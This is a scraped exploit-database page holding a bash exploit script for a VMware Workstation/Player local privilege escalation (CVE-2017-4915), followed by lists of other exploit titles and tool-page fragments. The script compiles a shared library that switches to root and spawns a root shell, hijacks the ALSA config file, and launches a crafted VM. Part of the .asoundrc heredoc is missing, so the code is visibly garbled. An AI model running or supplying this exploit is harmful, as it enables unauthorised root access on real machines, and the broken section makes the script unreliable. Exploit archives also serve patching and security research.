Menu

Search for hundreds of thousands of exploits

"VMware Workstation/Player < 12.5.5 - Local Privilege Escalation"

Author

Exploit author

bcoles

Platform

Exploit platform

multiple

Release date

Exploit published date

2018-12-30

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
#!/bin/bash
################################################################################
# VMware Workstation Local Privilege Escalation exploit (CVE-2017-4915)        #
#  - https://www.vmware.com/security/advisories/VMSA-2017-0009.html            #
#  - https://www.exploit-db.com/exploits/42045/                                #
#                                                                              #
# Affects:                                                                     #
#  - VMware Workstation Player <= 12.5.5                                       #
#  - VMware Workstation Pro <= 12.5.5                                          #
################################################################################
# ~ bcoles

VM_PLAYER=/usr/bin/vmplayer
GCC=/usr/bin/gcc

RAND_STR=$(echo $RANDOM | tr '[0-9]' '[a-zA-Z]')
VM_DIR=$HOME/.$RAND_STR

echo "[*] Creating directory $VM_DIR"

mkdir "$VM_DIR"

if [ $? -ne 0 ] ; then
  echo "[-] Could not create $VM_DIR"
  exit 1
fi

echo "[*] Writing $VM_DIR/$RAND_STR.c"

cat > "$VM_DIR/$RAND_STR.c" <<EOL
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/prctl.h>
#include <err.h>
extern char *program_invocation_short_name;
__attribute__((constructor)) void run(void) {
  uid_t ruid, euid, suid;
  if (getresuid(&ruid, &euid, &suid))
    err(1, "getresuid");
  printf("[*] Current UIDs: %d %d %d\n", ruid, euid, suid);
  if (ruid == 0 || euid == 0 || suid == 0) {
    if (setresuid(0, 0, 0) || setresgid(0, 0, 0))
      err(1, "setresxid");
    printf("switched to root UID and GID");
    system("/bin/bash");
    _exit(0);
  }
}
EOL

echo "[*] Compiling $VM_DIR/$RAND_STR.c"

$GCC -shared -o "$VM_DIR/$RAND_STR.so" "$VM_DIR/$RAND_STR.c" -fPIC -Wall -ldl -std=gnu99

if [ $? -ne 0 ] ; then
  echo "[-] Compilation failed"
  exit 1
fi

echo "[*] Removing $VM_DIR/$RAND_STR.c"
rm "$VM_DIR/$RAND_STR.c"

echo "[*] Writing $HOME/.asoundrc"
  lib "$VM_DIR/$RAND_STR.so"
  func "conf_pulse_hook_load_if_running"
}
EOL

echo "[*] Writing $VM_DIR/$RAND_STR.vmx"

cat > "$VM_DIR/$RAND_STR.vmx" <<EOL
.encoding = "UTF-8"
config.version = "8"
virtualHW.version = "8"
scsi0.present = "FALSE"
memsize = "4"
ide0:0.present = "FALSE"
sound.present = "TRUE"
sound.fileName = "-1"
sound.autodetect = "TRUE"
vmci0.present = "FALSE"
hpet0.present = "FALSE"
displayName = "$RAND_STR"
guestOS = "other"
nvram = "$RAND_STR.nvram"
virtualHW.productCompatibility = "hosted"
gui.exitOnCLIHLT = "FALSE"
powerType.powerOff = "soft"
powerType.powerOn = "soft"
powerType.suspend = "soft"
powerType.reset = "soft"
floppy0.present = "FALSE"
monitor_control.disable_longmode = 1
EOL

echo "[*] Disabling VMware hint popups"

if [ ! -d "$HOME/.vmware" ]; then
  mkdir "$HOME/.vmware"
fi

if [ -f "$HOME/.vmware/preferences" ]; then
  if grep -qi "hints.hideall" "$HOME/.vmware/preferences"; then
    sed -i 's/hints\.hideAll\s*=\s*"FALSE"/hints.hideAll = "TRUE"/i' "$HOME/.vmware/preferences"
  else
    echo 'hints.hideAll = "TRUE"' >> "$HOME/.vmware/preferences"
  fi
else
  echo '.encoding = "UTF8"' > "$HOME/.vmware/preferences"
  echo 'pref.vmplayer.firstRunDismissedVersion = "999"' >> "$HOME/.vmware/preferences"
  echo 'hints.hideAll = "TRUE"' >> "$HOME/.vmware/preferences"
fi

echo "[*] Launching VMware Player..."
$VM_PLAYER "$VM_DIR/$RAND_STR.vmx"

echo "[*] Removing $HOME/.asoundrc"
rm "$HOME/.asoundrc"

echo "[!] Remove $VM_DIR when you're done"
rmdir "$VM_DIR"

################################################################################
# EOF
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2019-07-24 "Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation" local linux bcoles
2019-01-13 "Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)" local multiple bcoles
2019-01-13 "S-nail < 14.8.16 - Local Privilege Escalation" local multiple bcoles
2019-01-12 "ASAN/SUID - Local Privilege Escalation" local multiple bcoles
2019-01-04 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (polkit Method)" local linux bcoles
2019-01-04 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (dbus Method)" local linux bcoles
2018-12-30 "Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation" local multiple bcoles
2018-12-30 "VMware Workstation/Player < 12.5.5 - Local Privilege Escalation" local multiple bcoles
2018-12-29 "Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation" local linux bcoles
2018-12-29 "Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation" local linux bcoles
2018-12-29 "Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)" local linux bcoles
2018-11-21 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (ldpreload Method)" local linux bcoles
2018-11-21 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (cron Method)" local linux bcoles 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected